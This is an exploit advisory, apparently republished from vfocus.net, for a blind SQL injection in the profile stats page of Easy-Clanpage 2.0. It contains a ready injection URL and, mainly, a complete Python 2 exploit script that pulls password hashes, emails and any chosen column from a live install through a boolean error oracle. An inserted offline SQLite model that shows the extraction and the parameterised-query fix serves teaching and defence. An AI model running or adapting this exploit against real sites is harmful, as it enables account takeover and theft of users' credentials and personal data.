Easy-Clanpage version 2.0 remote profile page blind SQL injection exploit
Source: vfocus.net  Author: Laster  Published: 2010-03-25
----------------------------Information------------------------------------------------
+Name : Easy-Clanpage <= v2.0 Blind SQL Injection Exploit
+Author : Easy Laster
+Date   : 24.03.2010
+Script  : Easy-Clanpage v2.0
+Download : http://www.easy-clanpage.de/?section=downloads&action=viewdl&id=12
+Demo : http://capu87.ca.funpic.de/
+Price : for free
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne.

---------------------------------------------------------------------------------------
                                                                                     
 ___ ___ ___ ___                         _ _           _____           _         _   
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_ 
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|  
                                              |___|                 |___|            


----------------------------------------------------------------------------------------
+Vulnerability : http://localhost/ecp_version2/?section=user&action=details&func=stats&id=

#Blind SQL Injection
The id parameter of the profile stats page is concatenated into the query unvalidated. When the injected condition is true the page renders normally; when it is false no row comes back and the page prints a PHP mysql_result() warning. That difference is the boolean oracle the exploit below uses to read a column one character at a time.
+Exploitable   : http://localhost/ecp_version2/?section=user&action=details&func=stats&id=1+and+1=1+and+ascii(substring((SELECT password FROM ecp_user+WHERE+userID=1 LIMIT 0,1),1,1))>1
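The oracle described above can be modelled offline. What follows is an added example, not code from this advisory or from Easy-Clanpage: it builds a constructed SQLite table standing in for ecp_user, reproduces the concatenation bug, recovers a column with a binary search over the character value (8 requests per character rather than a linear scan of a charset), and shows that the same probes recover nothing once the id is validated and bound as a parameter. The schema, the sample user row and the use of SQLite's unicode(substr()) in place of MySQL's ascii(substring()) are assumptions of the example.

```python
"""Boolean-blind extraction against an offline model of the ECP stats page.

Added example; not code from the advisory or from Easy-Clanpage. The table,
the user row and the password hash are constructed sample data, and SQLite's
unicode(substr()) stands in for the MySQL ascii(substring()) of the real payload.
"""
import hashlib
import sqlite3
from typing import Callable, Tuple

# Constructed sample password; the ecp_user layout below is assumed, not copied.
SAMPLE_HASH = hashlib.md5(b"hunter2").hexdigest()


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE ecp_user (userID INTEGER PRIMARY KEY, "
               "username TEXT, email TEXT, password TEXT)")
    db.execute("INSERT INTO ecp_user VALUES (1, 'admin', 'admin@example.invalid', ?)",
               (SAMPLE_HASH,))
    return db


def vulnerable_lookup(db: sqlite3.Connection, user_id: str) -> bool:
    """Model of the vulnerable page: `id` is concatenated straight into the SQL.
    True means a row came back (page renders); False is the state the real page
    leaks through its mysql_result() warning."""
    sql = "SELECT username FROM ecp_user WHERE userID=" + user_id
    return db.execute(sql).fetchone() is not None


def hardened_lookup(db: sqlite3.Connection, user_id: str) -> bool:
    """Same lookup with the id validated as an integer and bound as a parameter,
    so the boolean payloads never reach the SQL parser."""
    try:
        uid = int(user_id)
    except ValueError:
        return False
    row = db.execute("SELECT username FROM ecp_user WHERE userID=?", (uid,)).fetchone()
    return row is not None


def payload(user_id: int, column: str, pos: int, threshold: int) -> str:
    # Same shape as the advisory's "1 and 1=1 and ascii(substring(...))>N".
    # coalesce(..., 0) makes a position past the end of the value compare as 0,
    # matching MySQL's ascii('') and giving the extractor its terminator.
    return (f"{user_id} AND 1=1 AND coalesce(unicode(substr("
            f"(SELECT {column} FROM ecp_user WHERE userID={user_id} LIMIT 1),"
            f"{pos},1)),0)>{threshold}")


def extract_char(oracle: Callable[[str], bool], user_id: int,
                 column: str, pos: int) -> Tuple[int, int]:
    """Binary search for the byte at `pos` in [0, 255]. Returns (value, queries);
    the search always needs exactly 8 oracle queries."""
    lo, hi, queries = 0, 255, 0
    while lo < hi:
        mid = (lo + hi) // 2
        queries += 1
        if oracle(payload(user_id, column, pos, mid)):
            lo = mid + 1      # condition true: value > mid
        else:
            hi = mid          # condition false (warning on the real page): value <= mid
    return lo, queries


def extract_value(oracle: Callable[[str], bool], user_id: int,
                  column: str, max_len: int = 64) -> Tuple[str, int]:
    """Read `column` for `user_id` byte by byte until the 0 terminator or max_len.
    Returns (recovered string, total oracle queries)."""
    value, total = "", 0
    for pos in range(1, max_len + 1):
        code, q = extract_char(oracle, user_id, column, pos)
        total += q
        if code == 0:
            break
        value += chr(code)
    return value, total


if __name__ == "__main__":
    db = make_db()
    leaked, n = extract_value(lambda p: vulnerable_lookup(db, p), 1, "password")
    print("vulnerable: %s (%d queries, correct=%s)" % (leaked, n, leaked == SAMPLE_HASH))
    leaked, n = extract_value(lambda p: hardened_lookup(db, p), 1, "password")
    print("hardened:   %r (%d queries)" % (leaked, n))
```

Against the vulnerable lookup the 32-character hash costs 33 rounds of 8 queries (one round per character plus the terminator); against the parameterised lookup every probe is rejected before it reaches SQL, the first round converges on 0, and the extractor returns an empty string.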
-----------------------------------------------------------------------------------------
#Blind SQL Injection Exploit

#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Python 2 script (print statement, urllib2). Every request asks the page whether
# one character of the target value is greater than a guess; a false condition
# returns no row, and the page leaks that through a mysql_result() warning.
import sys, urllib2, getopt

def out(s):
    # Write without a newline so characters appear as they are recovered.
    sys.stdout.write(s)
    sys.stdout.flush()

class Exploit:
    charset = "0123456789abcdefABCDEF"   # MD5 hex digits, lowercase tried first
    url = ""
    charn = 1            # 1-based position of the character being extracted
    id = 1               # target userID
    table_prefix = ""    # ECP table prefix, if the install uses one
    table_field = ""     # column currently being read
    passwd = ""
    columns = []         # entries of [max_chars, column_name, value_so_far]
    find_passwd = True

    def __init__(self):
        if len(sys.argv) < 2:
            print "*****************************************************************************"
            print "******************** Easy-Clanpage V2.0 Profil Page Hack ********************"
            print "*****************************************************************************"
            print "*                Discovered and vulnerability by Easy Laster                *"
            print "*                             coded by Dr.ChAoS                             *"
            print "*****************************************************************************"
            print "* Usage:                                                                    *"
            print "* python exploit.py [OPTION...] [SWITCH...] <url>                           *"
            print "*                                                                           *"
            print "* Example:                                                                  *"
            print "*                                                                           *"
            print "* Get the password of the user with id 2:                                   *"
            print "* python exploit.py --id 2 http://site.de/ecp/                              *"
            print "*                                                                           *"
            print "* Get email and username of id 1:                                           *"
            print "* python exploit.py --columns 80:email,25:username --nopw http://site.de/ecp *"
            print "*                                                                           *"
            print "* Switches:                                                                 *"
            print "* --nopw                                  Skip the password lookup          *"
            print "*                                                                           *"
            print "* Options:                                                                  *"
            print "* --id=<user id>                          User id                           *"
            print "* --prefix=<table prefix>                 Table prefix of ECP               *"
            print "* --columns=<max_chars:column_name,...>   Get value of any column you want  *"
            print "*****************************************************************************"
            exit()
        opts, args = getopt.getopt(sys.argv[1:], "", ["id=", "prefix=", "columns=", "nopw"])
        for opt in opts:
            if opt[0] == "--id":
                self.id = int(opt[1])
            elif opt[0] == "--prefix":
                self.table_prefix = opt[1]
            elif opt[0] == "--columns":
                for col in opt[1].split(","):
                    maxlen, name = col.split(":")
                    self.columns.append([maxlen, name, ""])
            elif opt[0] == "--nopw":
                self.find_passwd = False
        # The remaining argument is the base URL of the ECP install.
        for arg in args:
            if arg[:4] == "http":
                if arg[-1:] == "/":
                    self.url = arg
                else:
                    self.url = arg + "/"

    def generate_url(self, ascii):
        # Injected condition: ascii(substring(<field>, charn, 1)) > ord(ascii)
        return self.url + "index.php?section=user&action=details&func=stats&id=1+and+1=1+and+ascii(substring((SELECT%20" + self.table_field + "%20FROM%20" + self.table_prefix + "ecp_user%20WHERE%20userID=" + str(self.id) + "%20LIMIT%200,1)," + str(self.charn) + ",1))%3E" + str(ord(ascii))

    def start(self):
        print "Exploiting..."
        if self.find_passwd:
            self.password()
        if len(self.columns) > 0:
            self.read_columns()
        print "All finished!\n"
        print "------ Results ------"
        if len(self.columns) > 0:
            for v in self.columns:
                print "Column \"" + v[1] + "\": " + v[2]
        if self.find_passwd:
            if len(self.passwd) == 32:
                print "Password: " + self.passwd
            else:
                print "Password not found!"
        print "--------------------"

    def read_columns(self):
        # Probe 0 first: ascii('') is 0 once charn is past the end of the value,
        # so a warning on the 0 probe marks the end of the string.
        charrange = [0]
        charrange.extend(range(32, 256))
        for i in range(len(self.columns)):
            end = False   # reset for every column
            out("Getting value of \"" + self.columns[i][1] + "\": ")
            self.table_field = self.columns[i][1]
            for pwc in range(1, int(self.columns[i][0]) + 1):
                if end:
                    break
                self.charn = pwc
                for c in charrange:
                    src = urllib2.urlopen(self.generate_url(chr(c))).read()
                    if "<b>Warning</b>:  mysql_result() [" in src:
                        # First c for which "value > c" is false: with an ascending
                        # scan that means value == c, or end of string when c == 0.
                        if c == 0:
                            end = True
                        else:
                            self.columns[i][2] += chr(c)
                            out(chr(c))
                        break
            out("\n")

    def password(self):
        # 32 hex characters of the MD5 password hash, found by a linear scan of charset.
        out("Getting password: ")
        self.table_field = "password"
        for pwc in range(1, 33):
            self.charn = pwc
            for c in self.charset:
                src = urllib2.urlopen(self.generate_url(c)).read()
                if "<b>Warning</b>:  mysql_result() [" in src:
                    self.passwd += c
                    out(c)
                    break
        out("\n")

exploit = Exploit()
exploit.start()
